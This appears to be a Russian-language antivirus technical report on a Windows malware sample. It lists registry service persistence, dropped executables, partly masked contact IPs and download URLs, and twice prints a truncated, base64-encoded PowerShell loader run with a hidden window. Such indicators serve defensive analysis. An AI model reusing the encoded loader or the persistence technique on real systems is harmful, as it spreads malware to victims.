Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\RpcDiag] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\RpcDiag] 'ImagePath' = '"%WINDIR%\SysWOW64\radarrs\RpcDiag.exe"'
- 'RpcDiag' "%WINDIR%\SysWOW64\radarrs\RpcDiag.exe"
- 'RpcDiag' %WINDIR%\SysWOW64\radarrs\RpcDiag.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAGIAOQBqADAAYgB4AD0AKAAnAE0AbAAnACsAKAAnAGgAbQAxACcAKwAnADEAagAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgB2ADoAdABlAG0AcABcAFcAbwByAEQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG...
- %TEMP%\word\2019\n3tnr9z.exe
- %WINDIR%\syswow64\radarrs\rpcdiag.exe
- %TEMP%\word\2019\n3tnr9z.exe в %WINDIR%\syswow64\radarrs\rpcdiag.exe
- '17#.#1.208.86':80
- '45.#5.36.51':443
- http://www.ve###itize.com/wp-includes/l9K6YJ/
- http://17#.#1.208.86/LJPlup/ERpXgFW2A/FfEpR0/XMF9hsXWFM4rr6/4lwWJmWiPFXX/
- http://45.##.36.51:443/UApcS1sOiB/ via 45.#5.36.51
- DNS ASK so####rucken.com
- DNS ASK ve###itize.com
- '%TEMP%\word\2019\n3tnr9z.exe'
- '%WINDIR%\syswow64\radarrs\rpcdiag.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAGIAOQBqADAAYgB4AD0AKAAnAE0AbAAnACsAKAAnAGgAbQAxACcAKwAnADEAagAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgB2ADoAdABlAG0AcABcAFcAbwByAEQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG...' (со скрытым окном)